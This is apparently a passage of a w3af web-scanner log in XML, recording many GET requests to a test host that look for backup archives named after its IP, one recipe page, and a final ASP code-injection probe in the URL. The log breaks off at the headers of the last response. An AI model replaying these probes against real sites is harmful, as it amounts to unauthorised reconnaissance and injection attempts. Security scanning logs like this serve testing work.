h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="234">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="252">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.25.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.25.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="255">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Response.Write%28new+String%28%22iyyrl%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
